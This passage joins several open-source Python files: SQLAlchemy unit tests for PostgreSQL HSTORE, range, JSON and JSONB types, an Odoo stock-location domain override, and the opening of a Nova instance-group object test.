proc = self.test_table.c.hash.type._cached_result_processor(
dialect, None)
eq_(
proc('"\\\\\\"a"=>"\\\\\\"1"'),
{'\\"a': '\\"1'}
)
def test_bind_serialize_psycopg2(self):
from sqlalchemy.dialects.postgresql import psycopg2
dialect = psycopg2.PGDialect_psycopg2()
dialect._has_native_hstore = True
proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
is_(proc, None)
dialect = psycopg2.PGDialect_psycopg2()
dialect._has_native_hstore = False
proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
eq_(
proc(util.OrderedDict([("key1", "value1"), ("key2", "value2")])),
'"key1"=>"value1", "key2"=>"value2"'
)
def test_result_deserialize_psycopg2(self):
from sqlalchemy.dialects.postgresql import psycopg2
dialect = psycopg2.PGDialect_psycopg2()
dialect._has_native_hstore = True
proc = self.test_table.c.hash.type._cached_result_processor(
dialect, None)
is_(proc, None)
dialect = psycopg2.PGDialect_psycopg2()
dialect._has_native_hstore = False
proc = self.test_table.c.hash.type._cached_result_processor(
dialect, None)
eq_(
proc('"key2"=>"value2", "key1"=>"value1"'),
{"key1": "value1", "key2": "value2"}
)
def test_where_has_key(self):
self._test_where(
# hide from 2to3
getattr(self.hashcol, 'has_key')('foo'),
"test_table.hash ? %(hash_1)s"
)
def test_where_has_all(self):
self._test_where(
self.hashcol.has_all(postgresql.array(['1', '2'])),
"test_table.hash ?& ARRAY[%(param_1)s, %(param_2)s]"
)
def test_where_has_any(self):
self._test_where(
self.hashcol.has_any(postgresql.array(['1', '2'])),
"test_table.hash ?| ARRAY[%(param_1)s, %(param_2)s]"
)
def test_where_defined(self):
self._test_where(
self.hashcol.defined('foo'),
"defined(test_table.hash, %(param_1)s)"
)
def test_where_contains(self):
self._test_where(
self.hashcol.contains({'foo': '1'}),
"test_table.hash @> %(hash_1)s"
)
def test_where_contained_by(self):
self._test_where(
self.hashcol.contained_by({'foo': '1', 'bar': None}),
"test_table.hash <@ %(hash_1)s"
)
def test_where_getitem(self):
self._test_where(
self.hashcol['bar'] == None,
"(test_table.hash -> %(hash_1)s) IS NULL"
)
def test_cols_get(self):
self._test_cols(
self.hashcol['foo'],
"test_table.hash -> %(hash_1)s AS anon_1",
True
)
def test_cols_delete_single_key(self):
self._test_cols(
self.hashcol.delete('foo'),
"delete(test_table.hash, %(param_1)s) AS delete_1",
True
)
def test_cols_delete_array_of_keys(self):
self._test_cols(
self.hashcol.delete(postgresql.array(['foo', 'bar'])),
("delete(test_table.hash, ARRAY[%(param_1)s, %(param_2)s]) "
"AS delete_1"),
True
)
def test_cols_delete_matching_pairs(self):
self._test_cols(
self.hashcol.delete(hstore('1', '2')),
("delete(test_table.hash, hstore(%(param_1)s, %(param_2)s)) "
"AS delete_1"),
True
)
def test_cols_slice(self):
self._test_cols(
self.hashcol.slice(postgresql.array(['1', '2'])),
("slice(test_table.hash, ARRAY[%(param_1)s, %(param_2)s]) "
"AS slice_1"),
True
)
def test_cols_hstore_pair_text(self):
self._test_cols(
hstore('foo', '3')['foo'],
"hstore(%(param_1)s, %(param_2)s) -> %(hstore_1)s AS anon_1",
False
)
def test_cols_hstore_pair_array(self):
self._test_cols(
hstore(postgresql.array(['1', '2']),
postgresql.array(['3', None]))['1'],
("hstore(ARRAY[%(param_1)s, %(param_2)s], "
"ARRAY[%(param_3)s, NULL]) -> %(hstore_1)s AS anon_1"),
False
)
def test_cols_hstore_single_array(self):
self._test_cols(
hstore(postgresql.array(['1', '2', '3', None]))['3'],
("hstore(ARRAY[%(param_1)s, %(param_2)s, %(param_3)s, NULL]) "
"-> %(hstore_1)s AS anon_1"),
False
)
def test_cols_concat(self):
self._test_cols(
self.hashcol.concat(hstore(cast(self.test_table.c.id, Text), '3')),
("test_table.hash || hstore(CAST(test_table.id AS TEXT), "
"%(param_1)s) AS anon_1"),
True
)
def test_cols_concat_op(self):
self._test_cols(
hstore('foo', 'bar') + self.hashcol,
"hstore(%(param_1)s, %(param_2)s) || test_table.hash AS anon_1",
True
)
def test_cols_concat_get(self):
self._test_cols(
(self.hashcol + self.hashcol)['foo'],
"test_table.hash || test_table.hash -> %(param_1)s AS anon_1"
)
def test_cols_keys(self):
self._test_cols(
# hide from 2to3
getattr(self.hashcol, 'keys')(),
"akeys(test_table.hash) AS akeys_1",
True
)
def test_cols_vals(self):
self._test_cols(
self.hashcol.vals(),
"avals(test_table.hash) AS avals_1",
True
)
def test_cols_array(self):
self._test_cols(
self.hashcol.array(),
"hstore_to_array(test_table.hash) AS hstore_to_array_1",
True
)
def test_cols_matrix(self):
self._test_cols(
self.hashcol.matrix(),
"hstore_to_matrix(test_table.hash) AS hstore_to_matrix_1",
True
)
class HStoreRoundTripTest(fixtures.TablesTest):
__requires__ = 'hstore',
__dialect__ = 'postgresql'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table('data_table', metadata,
Column('id', Integer, primary_key=True),
Column('name', String(30), nullable=False),
Column('data', HSTORE)
)
def _fixture_data(self, engine):
data_table = self.tables.data_table
engine.execute(
data_table.insert(),
{'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}},
{'name': 'r2', 'data': {"k1": "r2v1", "k2": "r2v2"}},
{'name': 'r3', 'data': {"k1": "r3v1", "k2": "r3v2"}},
{'name': 'r4', 'data': {"k1": "r4v1", "k2": "r4v2"}},
{'name': 'r5', 'data': {"k1": "r5v1", "k2": "r5v2"}},
)
def _assert_data(self, compare):
data = testing.db.execute(
select([self.tables.data_table.c.data]).
order_by(self.tables.data_table.c.name)
).fetchall()
eq_([d for d, in data], compare)
def _test_insert(self, engine):
engine.execute(
self.tables.data_table.insert(),
{'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}}
)
self._assert_data([{"k1": "r1v1", "k2": "r1v2"}])
def _non_native_engine(self):
if testing.requires.psycopg2_native_hstore.enabled:
engine = engines.testing_engine(
options=dict(
use_native_hstore=False))
else:
engine = testing.db
engine.connect().close()
return engine
def test_reflect(self):
insp = inspect(testing.db)
cols = insp.get_columns('data_table')
assert isinstance(cols[2]['type'], HSTORE)
@testing.requires.psycopg2_native_hstore
def test_insert_native(self):
engine = testing.db
self._test_insert(engine)
def test_insert_python(self):
engine = self._non_native_engine()
self._test_insert(engine)
@testing.requires.psycopg2_native_hstore
def test_criterion_native(self):
engine = testing.db
self._fixture_data(engine)
self._test_criterion(engine)
def test_criterion_python(self):
engine = self._non_native_engine()
self._fixture_data(engine)
self._test_criterion(engine)
def _test_criterion(self, engine):
data_table = self.tables.data_table
result = engine.execute(
select([data_table.c.data]).where(
data_table.c.data['k1'] == 'r3v1')).first()
eq_(result, ({'k1': 'r3v1', 'k2': 'r3v2'},))
def _test_fixed_round_trip(self, engine):
s = select([
hstore(
array(['key1', 'key2', 'key3']),
array(['value1', 'value2', 'value3'])
)
])
eq_(
engine.scalar(s),
{"key1": "value1", "key2": "value2", "key3": "value3"}
)
def test_fixed_round_trip_python(self):
engine = self._non_native_engine()
self._test_fixed_round_trip(engine)
@testing.requires.psycopg2_native_hstore
def test_fixed_round_trip_native(self):
engine = testing.db
self._test_fixed_round_trip(engine)
def _test_unicode_round_trip(self, engine):
s = select([
hstore(
array([util.u('réveillé'), util.u('drôle'), util.u('S’il')]),
array([util.u('réveillé'), util.u('drôle'), util.u('S’il')])
)
])
eq_(
engine.scalar(s),
{
util.u('réveillé'): util.u('réveillé'),
util.u('drôle'): util.u('drôle'),
util.u('S’il'): util.u('S’il')
}
)
@testing.requires.psycopg2_native_hstore
def test_unicode_round_trip_python(self):
engine = self._non_native_engine()
self._test_unicode_round_trip(engine)
@testing.requires.psycopg2_native_hstore
def test_unicode_round_trip_native(self):
engine = testing.db
self._test_unicode_round_trip(engine)
def test_escaped_quotes_round_trip_python(self):
engine = self._non_native_engine()
self._test_escaped_quotes_round_trip(engine)
@testing.requires.psycopg2_native_hstore
def test_escaped_quotes_round_trip_native(self):
engine = testing.db
self._test_escaped_quotes_round_trip(engine)
def _test_escaped_quotes_round_trip(self, engine):
engine.execute(
self.tables.data_table.insert(),
{'name': 'r1', 'data': {r'key \"foo\"': r'value \"bar"\ xyz'}}
)
self._assert_data([{r'key \"foo\"': r'value \"bar"\ xyz'}])
def test_orm_round_trip(self):
from sqlalchemy import orm
class Data(object):
def __init__(self, name, data):
self.name = name
self.data = data
orm.mapper(Data, self.tables.data_table)
s = orm.Session(testing.db)
d = Data(name='r1', data={"key1": "value1", "key2": "value2",
"key3": "value3"})
s.add(d)
eq_(
s.query(Data.data, Data).all(),
[(d.data, d)]
)
class _RangeTypeMixin(object):
__requires__ = 'range_types', 'psycopg2_compatibility'
__backend__ = True
def extras(self):
# done this way so we don't get ImportErrors with
# older psycopg2 versions.
if testing.against("postgresql+psycopg2cffi"):
from psycopg2cffi import extras
else:
from psycopg2 import extras
return extras
@classmethod
def define_tables(cls, metadata):
# no reason ranges shouldn't be primary keys,
# so lets just use them as such
table = Table('data_table', metadata,
Column('range', cls._col_type, primary_key=True),
)
cls.col = table.c.range
def test_actual_type(self):
eq_(str(self._col_type()), self._col_str)
def test_reflect(self):
from sqlalchemy import inspect
insp = inspect(testing.db)
cols = insp.get_columns('data_table')
assert isinstance(cols[0]['type'], self._col_type)
def _assert_data(self):
data = testing.db.execute(
select([self.tables.data_table.c.range])
).fetchall()
eq_(data, [(self._data_obj(), )])
def test_insert_obj(self):
testing.db.engine.execute(
self.tables.data_table.insert(),
{'range': self._data_obj()}
)
self._assert_data()
def test_insert_text(self):
testing.db.engine.execute(
self.tables.data_table.insert(),
{'range': self._data_str}
)
self._assert_data()
# operator tests
def _test_clause(self, colclause, expected):
dialect = postgresql.dialect()
compiled = str(colclause.compile(dialect=dialect))
eq_(compiled, expected)
def test_where_equal(self):
self._test_clause(
self.col == self._data_str,
"data_table.range = %(range_1)s"
)
def test_where_not_equal(self):
self._test_clause(
self.col != self._data_str,
"data_table.range <> %(range_1)s"
)
def test_where_less_than(self):
self._test_clause(
self.col < self._data_str,
"data_table.range < %(range_1)s"
)
def test_where_greater_than(self):
self._test_clause(
self.col > self._data_str,
"data_table.range > %(range_1)s"
)
def test_where_less_than_or_equal(self):
self._test_clause(
self.col <= self._data_str,
"data_table.range <= %(range_1)s"
)
def test_where_greater_than_or_equal(self):
self._test_clause(
self.col >= self._data_str,
"data_table.range >= %(range_1)s"
)
def test_contains(self):
self._test_clause(
self.col.contains(self._data_str),
"data_table.range @> %(range_1)s"
)
def test_contained_by(self):
self._test_clause(
self.col.contained_by(self._data_str),
"data_table.range <@ %(range_1)s"
)
def test_overlaps(self):
self._test_clause(
self.col.overlaps(self._data_str),
"data_table.range && %(range_1)s"
)
def test_strictly_left_of(self):
self._test_clause(
self.col << self._data_str,
"data_table.range << %(range_1)s"
)
self._test_clause(
self.col.strictly_left_of(self._data_str),
"data_table.range << %(range_1)s"
)
def test_strictly_right_of(self):
self._test_clause(
self.col >> self._data_str,
"data_table.range >> %(range_1)s"
)
self._test_clause(
self.col.strictly_right_of(self._data_str),
"data_table.range >> %(range_1)s"
)
def test_not_extend_right_of(self):
self._test_clause(
self.col.not_extend_right_of(self._data_str),
"data_table.range &< %(range_1)s"
)
def test_not_extend_left_of(self):
self._test_clause(
self.col.not_extend_left_of(self._data_str),
"data_table.range &> %(range_1)s"
)
def test_adjacent_to(self):
self._test_clause(
self.col.adjacent_to(self._data_str),
"data_table.range -|- %(range_1)s"
)
def test_union(self):
self._test_clause(
self.col + self.col,
"data_table.range + data_table.range"
)
def test_union_result(self):
# insert
testing.db.engine.execute(
self.tables.data_table.insert(),
{'range': self._data_str}
)
# select
range = self.tables.data_table.c.range
data = testing.db.execute(
select([range + range])
).fetchall()
eq_(data, [(self._data_obj(), )])
def test_intersection(self):
self._test_clause(
self.col * self.col,
"data_table.range * data_table.range"
)
def test_intersection_result(self):
# insert
testing.db.engine.execute(
self.tables.data_table.insert(),
{'range': self._data_str}
)
# select
range = self.tables.data_table.c.range
data = testing.db.execute(
select([range * range])
).fetchall()
eq_(data, [(self._data_obj(), )])
def test_different(self):
self._test_clause(
self.col - self.col,
"data_table.range - data_table.range"
)
def test_difference_result(self):
# insert
testing.db.engine.execute(
self.tables.data_table.insert(),
{'range': self._data_str}
)
# select
range = self.tables.data_table.c.range
data = testing.db.execute(
select([range - range])
).fetchall()
eq_(data, [(self._data_obj().__class__(empty=True), )])
class Int4RangeTests(_RangeTypeMixin, fixtures.TablesTest):
_col_type = INT4RANGE
_col_str = 'INT4RANGE'
_data_str = '[1,2)'
def _data_obj(self):
return self.extras().NumericRange(1, 2)
class Int8RangeTests(_RangeTypeMixin, fixtures.TablesTest):
_col_type = INT8RANGE
_col_str = 'INT8RANGE'
_data_str = '[9223372036854775806,9223372036854775807)'
def _data_obj(self):
return self.extras().NumericRange(
9223372036854775806, 9223372036854775807
)
class NumRangeTests(_RangeTypeMixin, fixtures.TablesTest):
_col_type = NUMRANGE
_col_str = 'NUMRANGE'
_data_str = '[1.0,2.0)'
def _data_obj(self):
return self.extras().NumericRange(
decimal.Decimal('1.0'), decimal.Decimal('2.0')
)
class DateRangeTests(_RangeTypeMixin, fixtures.TablesTest):
_col_type = DATERANGE
_col_str = 'DATERANGE'
_data_str = '[2013-03-23,2013-03-24)'
def _data_obj(self):
return self.extras().DateRange(
datetime.date(2013, 3, 23), datetime.date(2013, 3, 24)
)
class DateTimeRangeTests(_RangeTypeMixin, fixtures.TablesTest):
_col_type = TSRANGE
_col_str = 'TSRANGE'
_data_str = '[2013-03-23 14:30,2013-03-23 23:30)'
def _data_obj(self):
return self.extras().DateTimeRange(
datetime.datetime(2013, 3, 23, 14, 30),
datetime.datetime(2013, 3, 23, 23, 30)
)
class DateTimeTZRangeTests(_RangeTypeMixin, fixtures.TablesTest):
_col_type = TSTZRANGE
_col_str = 'TSTZRANGE'
# make sure we use one, steady timestamp with timezone pair
# for all parts of all these tests
_tstzs = None
def tstzs(self):
if self._tstzs is None:
lower = testing.db.scalar(
func.current_timestamp().select()
)
upper = lower + datetime.timedelta(1)
self._tstzs = (lower, upper)
return self._tstzs
@property
def _data_str(self):
return '[%s,%s)' % self.tstzs()
def _data_obj(self):
return self.extras().DateTimeTZRange(*self.tstzs())
class JSONTest(AssertsCompiledSQL, fixtures.TestBase):
__dialect__ = 'postgresql'
def setup(self):
metadata = MetaData()
self.test_table = Table('test_table', metadata,
Column('id', Integer, primary_key=True),
Column('test_column', JSON),
)
self.jsoncol = self.test_table.c.test_column
def _test_where(self, whereclause, expected):
stmt = select([self.test_table]).where(whereclause)
self.assert_compile(
stmt,
"SELECT test_table.id, test_table.test_column FROM test_table "
"WHERE %s" % expected
)
def _test_cols(self, colclause, expected, from_=True):
stmt = select([colclause])
self.assert_compile(
stmt,
(
"SELECT %s" +
(" FROM test_table" if from_ else "")
) % expected
)
def test_bind_serialize_default(self):
dialect = postgresql.dialect()
proc = self.test_table.c.test_column.type._cached_bind_processor(
dialect)
eq_(
proc({"A": [1, 2, 3, True, False]}),
'{"A": [1, 2, 3, true, false]}'
)
def test_bind_serialize_None(self):
dialect = postgresql.dialect()
proc = self.test_table.c.test_column.type._cached_bind_processor(
dialect)
eq_(
proc(None),
'null'
)
def test_bind_serialize_none_as_null(self):
dialect = postgresql.dialect()
proc = JSON(none_as_null=True)._cached_bind_processor(
dialect)
eq_(
proc(None),
None
)
eq_(
proc(null()),
None
)
def test_bind_serialize_null(self):
dialect = postgresql.dialect()
proc = self.test_table.c.test_column.type._cached_bind_processor(
dialect)
eq_(
proc(null()),
None
)
def test_result_deserialize_default(self):
dialect = postgresql.dialect()
proc = self.test_table.c.test_column.type._cached_result_processor(
dialect, None)
eq_(
proc('{"A": [1, 2, 3, true, false]}'),
{"A": [1, 2, 3, True, False]}
)
def test_result_deserialize_null(self):
dialect = postgresql.dialect()
proc = self.test_table.c.test_column.type._cached_result_processor(
dialect, None)
eq_(
proc('null'),
None
)
def test_result_deserialize_None(self):
dialect = postgresql.dialect()
proc = self.test_table.c.test_column.type._cached_result_processor(
dialect, None)
eq_(
proc(None),
None
)
# This test is a bit misleading -- in real life you will need to cast to
# do anything
def test_where_getitem(self):
self._test_where(
self.jsoncol['bar'] == None,
"(test_table.test_column -> %(test_column_1)s) IS NULL"
)
def test_where_path(self):
self._test_where(
self.jsoncol[("foo", 1)] == None,
"(test_table.test_column #> %(test_column_1)s) IS NULL"
)
def test_where_getitem_as_text(self):
self._test_where(
self.jsoncol['bar'].astext == None,
"(test_table.test_column ->> %(test_column_1)s) IS NULL"
)
def test_where_getitem_as_cast(self):
self._test_where(
self.jsoncol['bar'].cast(Integer) == 5,
"CAST(test_table.test_column ->> %(test_column_1)s AS INTEGER) "
"= %(param_1)s"
)
def test_where_path_as_text(self):
self._test_where(
self.jsoncol[("foo", 1)].astext == None,
"(test_table.test_column #>> %(test_column_1)s) IS NULL"
)
def test_cols_get(self):
self._test_cols(
self.jsoncol['foo'],
"test_table.test_column -> %(test_column_1)s AS anon_1",
True
)
class JSONRoundTripTest(fixtures.TablesTest):
__only_on__ = ('postgresql >= 9.3',)
__backend__ = True
test_type = JSON
@classmethod
def define_tables(cls, metadata):
Table('data_table', metadata,
Column('id', Integer, primary_key=True),
Column('name', String(30), nullable=False),
Column('data', cls.test_type),
Column('nulldata', cls.test_type(none_as_null=True))
)
def _fixture_data(self, engine):
data_table = self.tables.data_table
engine.execute(
data_table.insert(),
{'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}},
{'name': 'r2', 'data': {"k1": "r2v1", "k2": "r2v2"}},
{'name': 'r3', 'data': {"k1": "r3v1", "k2": "r3v2"}},
{'name': 'r4', 'data': {"k1": "r4v1", "k2": "r4v2"}},
{'name': 'r5', 'data': {"k1": "r5v1", "k2": "r5v2", "k3": 5}},
)
def _assert_data(self, compare, column='data'):
col = self.tables.data_table.c[column]
data = testing.db.execute(
select([col]).
order_by(self.tables.data_table.c.name)
).fetchall()
eq_([d for d, in data], compare)
def _assert_column_is_NULL(self, column='data'):
col = self.tables.data_table.c[column]
data = testing.db.execute(
select([col]).
where(col.is_(null()))
).fetchall()
eq_([d for d, in data], [None])
def _test_insert(self, engine):
engine.execute(
self.tables.data_table.insert(),
{'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}}
)
self._assert_data([{"k1": "r1v1", "k2": "r1v2"}])
def _test_insert_nulls(self, engine):
engine.execute(
self.tables.data_table.insert(),
{'name': 'r1', 'data': null()}
)
self._assert_data([None])
def _test_insert_none_as_null(self, engine):
engine.execute(
self.tables.data_table.insert(),
{'name': 'r1', 'nulldata': None}
)
self._assert_column_is_NULL(column='nulldata')
def _non_native_engine(self, json_serializer=None, json_deserializer=None):
if json_serializer is not None or json_deserializer is not None:
options = {
"json_serializer": json_serializer,
"json_deserializer": json_deserializer
}
else:
options = {}
if testing.against("postgresql+psycopg2") and \
testing.db.dialect.psycopg2_version >= (2, 5):
from psycopg2.extras import register_default_json
engine = engines.testing_engine(options=options)
@event.listens_for(engine, "connect")
def connect(dbapi_connection, connection_record):
engine.dialect._has_native_json = False
def pass_(value):
return value
register_default_json(dbapi_connection, loads=pass_)
elif options:
engine = engines.testing_engine(options=options)
else:
engine = testing.db
engine.connect().close()
return engine
def test_reflect(self):
insp = inspect(testing.db)
cols = insp.get_columns('data_table')
assert isinstance(cols[2]['type'], self.test_type)
@testing.requires.psycopg2_native_json
def test_insert_native(self):
engine = testing.db
self._test_insert(engine)
@testing.requires.psycopg2_native_json
def test_insert_native_nulls(self):
engine = testing.db
self._test_insert_nulls(engine)
@testing.requires.psycopg2_native_json
def test_insert_native_none_as_null(self):
engine = testing.db
self._test_insert_none_as_null(engine)
def test_insert_python(self):
engine = self._non_native_engine()
self._test_insert(engine)
def test_insert_python_nulls(self):
engine = self._non_native_engine()
self._test_insert_nulls(engine)
def test_insert_python_none_as_null(self):
engine = self._non_native_engine()
self._test_insert_none_as_null(engine)
def _test_custom_serialize_deserialize(self, native):
import json
def loads(value):
value = json.loads(value)
value['x'] = value['x'] + '_loads'
return value
def dumps(value):
value = dict(value)
value['x'] = 'dumps_y'
return json.dumps(value)
if native:
engine = engines.testing_engine(options=dict(
json_serializer=dumps,
json_deserializer=loads
))
else:
engine = self._non_native_engine(
json_serializer=dumps,
json_deserializer=loads
)
s = select([
cast(
{
"key": "value",
"x": "q"
},
self.test_type
)
])
eq_(
engine.scalar(s),
{
"key": "value",
"x": "dumps_y_loads"
},
)
@testing.requires.psycopg2_native_json
def test_custom_native(self):
self._test_custom_serialize_deserialize(True)
@testing.requires.psycopg2_native_json
def test_custom_python(self):
self._test_custom_serialize_deserialize(False)
@testing.requires.psycopg2_native_json
def test_criterion_native(self):
engine = testing.db
self._fixture_data(engine)
self._test_criterion(engine)
def test_criterion_python(self):
engine = self._non_native_engine()
self._fixture_data(engine)
self._test_criterion(engine)
def test_path_query(self):
engine = testing.db
self._fixture_data(engine)
data_table = self.tables.data_table
result = engine.execute(
select([data_table.c.data]).where(
data_table.c.data[('k1',)].astext == 'r3v1'
)
).first()
eq_(result, ({'k1': 'r3v1', 'k2': 'r3v2'},))
def test_query_returned_as_text(self):
engine = testing.db
self._fixture_data(engine)
data_table = self.tables.data_table
result = engine.execute(
select([data_table.c.data['k1'].astext])
).first()
assert isinstance(result[0], util.text_type)
def test_query_returned_as_int(self):
engine = testing.db
self._fixture_data(engine)
data_table = self.tables.data_table
result = engine.execute(
select([data_table.c.data['k3'].cast(Integer)]).where(
data_table.c.name == 'r5')
).first()
assert isinstance(result[0], int)
def _test_criterion(self, engine):
data_table = self.tables.data_table
result = engine.execute(
select([data_table.c.data]).where(
data_table.c.data['k1'].astext == 'r3v1'
)
).first()
eq_(result, ({'k1': 'r3v1', 'k2': 'r3v2'},))
def _test_fixed_round_trip(self, engine):
s = select([
cast(
{
"key": "value",
"key2": {"k1": "v1", "k2": "v2"}
},
self.test_type
)
])
eq_(
engine.scalar(s),
{
"key": "value",
"key2": {"k1": "v1", "k2": "v2"}
},
)
def test_fixed_round_trip_python(self):
engine = self._non_native_engine()
self._test_fixed_round_trip(engine)
@testing.requires.psycopg2_native_json
def test_fixed_round_trip_native(self):
engine = testing.db
self._test_fixed_round_trip(engine)
def _test_unicode_round_trip(self, engine):
s = select([
cast(
{
util.u('réveillé'): util.u('réveillé'),
"data": {"k1": util.u('drôle')}
},
self.test_type
)
])
eq_(
engine.scalar(s),
{
util.u('réveillé'): util.u('réveillé'),
"data": {"k1": util.u('drôle')}
},
)
def test_unicode_round_trip_python(self):
engine = self._non_native_engine()
self._test_unicode_round_trip(engine)
@testing.requires.psycopg2_native_json
def test_unicode_round_trip_native(self):
engine = testing.db
self._test_unicode_round_trip(engine)
class JSONBTest(JSONTest):
def setup(self):
metadata = MetaData()
self.test_table = Table('test_table', metadata,
Column('id', Integer, primary_key=True),
Column('test_column', JSONB)
)
self.jsoncol = self.test_table.c.test_column
# Note - add fixture data for arrays []
def test_where_has_key(self):
self._test_where(
# hide from 2to3
getattr(self.jsoncol, 'has_key')('data'),
"test_table.test_column ? %(test_column_1)s"
)
def test_where_has_all(self):
self._test_where(
self.jsoncol.has_all(
{'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}}),
"test_table.test_column ?& %(test_column_1)s")
def test_where_has_any(self):
self._test_where(
self.jsoncol.has_any(postgresql.array(['name', 'data'])),
"test_table.test_column ?| ARRAY[%(param_1)s, %(param_2)s]"
)
def test_where_contains(self):
self._test_where(
self.jsoncol.contains({"k1": "r1v1"}),
"test_table.test_column @> %(test_column_1)s"
)
def test_where_contained_by(self):
self._test_where(
self.jsoncol.contained_by({'foo': '1', 'bar': None}),
"test_table.test_column <@ %(test_column_1)s"
)
class JSONBRoundTripTest(JSONRoundTripTest):
__only_on__ = ('postgresql >= 9.4',)
__requires__ = ('postgresql_jsonb', )
test_type = JSONB
@testing.requires.postgresql_utf8_server_encoding
def test_unicode_round_trip_python(self):
super(JSONBRoundTripTest, self).test_unicode_round_trip_python()
@testing.requires.postgresql_utf8_server_encoding
def test_unicode_round_trip_native(self):
super(JSONBRoundTripTest, self).test_unicode_round_trip_native()
| mit |
sysadminmatmoz/pmis | stock_analytic_account/model/product.py | 1 | 1712 | # -*- coding: utf-8 -*-
# Copyright 2014-17 Eficent Business and IT Consulting Services S.L.
# Copyright 2016 Matmoz d.o.o.
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import models
class Product(models.Model):
_inherit = "product.product"
def _get_domain_locations(self):
if self._context.get('analytic_account_id'):
locations = self.env['stock.location'].search(
[('analytic_account_id', '=', self._context.get(
'analytic_account_id'))]).ids
dom_loc_out = dom_quant = [('location_id', 'in', locations)]
dom_loc_in = [('location_dest_id', 'in', locations)]
return (dom_quant, dom_loc_in, dom_loc_out)
elif self._context.get('analytic_account_id_out'):
locations = self.env['stock.location'].search(
[('analytic_account_id', '=', self._context.get(
'analytic_account_id_out'))]).ids
customer_locations = self.env['stock.location'].search(
[('usage', '=', 'customer')]).ids
dom_loc_out = [('location_dest_id', 'in', locations),
('location_id', 'in', customer_locations), ]
dom_loc_in = [('location_dest_id', 'in', customer_locations),
('location_id', 'in', locations), ]
dom_quant = [
('location_id', 'in', customer_locations),
('analytic_account_id', '=',
self._context.get('analytic_account_id_out'))
]
return (dom_quant, dom_loc_in, dom_loc_out)
else:
return super(Product, self)._get_domain_locations()
| agpl-3.0 |
felixma/nova | nova/tests/unit/objects/test_instance_group.py | 27 | 14526 | # Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
import mock
from oslo_utils import timeutils
from nova import exception
from nova import objects
from nova.tests.unit.objects import test_objects
_TS_NOW = timeutils.utcnow(with_timezone=True)
# o.vo.fields.DateTimeField converts to tz-aware and
# in process we lose microsecond resolution.
_TS_NOW = _TS_NOW.replace(microsecond=0)
_DB_UUID = str(uuid.uuid4())
_INST_GROUP_DB = {
'id': 1,
'uuid': _DB_UUID,
'user_id': 'fake_user',
'project_id': 'fake_project',
'name': 'fake_name',
'policies': ['policy1', 'policy2'],
'members': ['instance_id1', 'instance_id2'],
'deleted': False,
'created_at': _TS_NOW,
'updated_at': _TS_NOW,
'deleted_at': None,
}
class _TestInstanceGroupObject(object):
@mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
def test_get_by_uuid(self, mock_db_get):
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx,
_DB_UUID)
mock_db_get.assert_called_once_with(mock.sentinel.ctx, _DB_UUID)
self.assertEqual(_INST_GROUP_DB['members'], obj.members)
self.assertEqual(_INST_GROUP_DB['policies'], obj.policies)
self.assertEqual(_DB_UUID, obj.uuid)
self.assertEqual(_INST_GROUP_DB['project_id'], obj.project_id)
self.assertEqual(_INST_GROUP_DB['user_id'], obj.user_id)
self.assertEqual(_INST_GROUP_DB['name'], obj.name)
@mock.patch('nova.db.instance_group_get_by_instance',
return_value=_INST_GROUP_DB)
def test_get_by_instance_uuid(self, mock_db_get):
objects.InstanceGroup.get_by_instance_uuid(
mock.sentinel.ctx, mock.sentinel.instance_uuid)
mock_db_get.assert_called_once_with(
mock.sentinel.ctx, mock.sentinel.instance_uuid)
@mock.patch('nova.db.instance_group_get')
def test_refresh(self, mock_db_get):
changed_group = copy.deepcopy(_INST_GROUP_DB)
changed_group['name'] = 'new_name'
mock_db_get.side_effect = [_INST_GROUP_DB, changed_group]
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx,
_DB_UUID)
self.assertEqual(_INST_GROUP_DB['name'], obj.name)
obj.refresh()
self.assertEqual('new_name', obj.name)
self.assertEqual(set([]), obj.obj_what_changed())
@mock.patch('nova.compute.utils.notify_about_server_group_update')
@mock.patch('nova.db.instance_group_update')
@mock.patch('nova.db.instance_group_get')
def test_save(self, mock_db_get, mock_db_update, mock_notify):
changed_group = copy.deepcopy(_INST_GROUP_DB)
changed_group['name'] = 'new_name'
mock_db_get.side_effect = [_INST_GROUP_DB, changed_group]
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx,
_DB_UUID)
self.assertEqual(obj.name, 'fake_name')
obj.name = 'new_name'
obj.policies = ['policy1'] # Remove policy 2
obj.members = ['instance_id1'] # Remove member 2
obj.save()
mock_db_update.assert_called_once_with(mock.sentinel.ctx, _DB_UUID,
{'name': 'new_name',
'members': ['instance_id1'],
'policies': ['policy1']})
mock_notify.assert_called_once_with(mock.sentinel.ctx, "update",
{'name': 'new_name',
'members': ['instance_id1'],
'policies': ['policy1'],
'server_group_id': _DB_UUID})
@mock.patch('nova.compute.utils.notify_about_server_group_update')
@mock.patch('nova.db.instance_group_update')
@mock.patch('nova.db.instance_group_get')
def test_save_without_hosts(self, mock_db_get, mock_db_update,
mock_notify):
mock_db_get.side_effect = [_INST_GROUP_DB, _INST_GROUP_DB]
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
obj.hosts = ['fake-host1']
self.assertRaises(exception.InstanceGroupSaveException,
obj.save)
# make sure that we can save by removing hosts from what is updated
obj.obj_reset_changes(['hosts'])
obj.save()
# since hosts was the only update, there is no actual call
self.assertFalse(mock_db_update.called)
self.assertFalse(mock_notify.called)
@mock.patch('nova.compute.utils.notify_about_server_group_update')
@mock.patch('nova.db.instance_group_create', return_value=_INST_GROUP_DB)
def test_create(self, mock_db_create, mock_notify):
